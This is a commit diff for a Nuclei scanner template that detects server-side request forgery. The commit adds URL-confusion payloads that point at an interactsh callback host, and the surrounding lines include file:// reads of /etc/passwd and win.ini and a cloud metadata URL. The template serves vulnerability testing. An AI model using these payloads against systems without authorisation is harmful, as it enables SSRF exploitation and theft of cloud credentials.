daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update response-ssrf.yaml

main
AmirHossein Raeisi 2024-07-22 16:19:11 +03:30 committed by GitHub
parent df04445d51
commit 2cba2ac444
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 6 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
dast/vulnerabilities/ssrf/response-ssrf.yaml
View File

@ -2,7 +2,7 @@ id: response-ssrf
info:
name: Full Response SSRF Detection
author: pdteam,pwnhxl,j4vaovo
author: pdteam,pwnhxl,j4vaovo,AmirHossein Raeisi
severity: high
reference:
- https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py
@ -20,7 +20,11 @@ http:
ssrf:
- 'http://{{interactsh-url}}'
- 'http://{{FQDN}}.{{interactsh-url}}'
- 'http://{{FQDN}}@{{interactsh-url}}'
- 'http://{{interactsh-url}}#{{FQDN}}'
- 'http://{{RDN}}.{{interactsh-url}}'
- 'http://{{RDN}}@{{interactsh-url}}'
- 'http://{{interactsh-url}}#{{RDN}}'
- 'file:////./etc/./passwd'
- 'file:///c:/./windows/./win.ini'
- 'http://metadata.tencentyun.com/latest/meta-data/'
@ -128,4 +132,4 @@ http:
part: body
regex:
- 'id[\s\S]+interfaces\/'
# digest: 4a0a00473045022100df5e466f9b2de4655561801dacd8444d412cca9556662839a5955b6c360fe47e022070272a7069a37a5df17d1177769fa87a3c21dcf8b8898e2b36652602d64adc9c:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100df5e466f9b2de4655561801dacd8444d412cca9556662839a5955b6c360fe47e022070272a7069a37a5df17d1177769fa87a3c21dcf8b8898e2b36652602d64adc9c:922c64590222798bb761d5b6d8e72950